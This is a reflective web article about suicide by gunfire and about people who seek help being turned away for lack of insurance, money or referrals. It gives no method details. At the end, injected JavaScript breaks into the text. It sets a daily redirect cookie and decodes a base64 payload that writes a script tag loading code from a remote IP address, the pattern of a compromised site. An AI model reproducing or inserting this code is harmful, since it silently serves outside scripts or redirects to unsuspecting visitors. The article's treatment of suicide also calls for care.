A beautiful sunrise appears, and a warm day is ahead…for everyone. Everyone else but the one who chose to take their own life by gunfire. The symptoms must have been apparent for 30 years – but who can keep watch over someone for so long?
Most ironic! How bizarre is the manner which the person chose! Was it the anger one would feel when someone would ask for help? No one – no professional – can determine when or if a person will commit suicide. The only one who knows is the victim.
The anger referred to above might have been reflected in questions asked when the person went for help:
1. Do you have insurance?
2. Do you have any money?
3. We are not accepting any new patients anymore.
4. You are not entitled to any services at this clinic.
5. We don’t accept anyone without a referral.
I know personally of four people who took their own lives by gunfire. And no one suspected what they were about to do! These people had names. They were no “Resident”, “To whom it may concern”, “Whoever”.
Not numbers. People like you and me. One wishes they could live to see another hard day with their friends. Maybe if God could give them just one more hard day – might they have lived? Might they have figured it all out? Or might things at least have turned around? Just…a little?
Would they live???
Probably a number of us, when young, dreamed of a time and place where things would be better – where those in authority would miraculously intervene in what was happening to us at home. Back then your editor found out that the world didn’t care all that much. Hopefully more people today not only are sympathetic but posess the tools and knowledge to be helpful. How about your situation today? ..match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
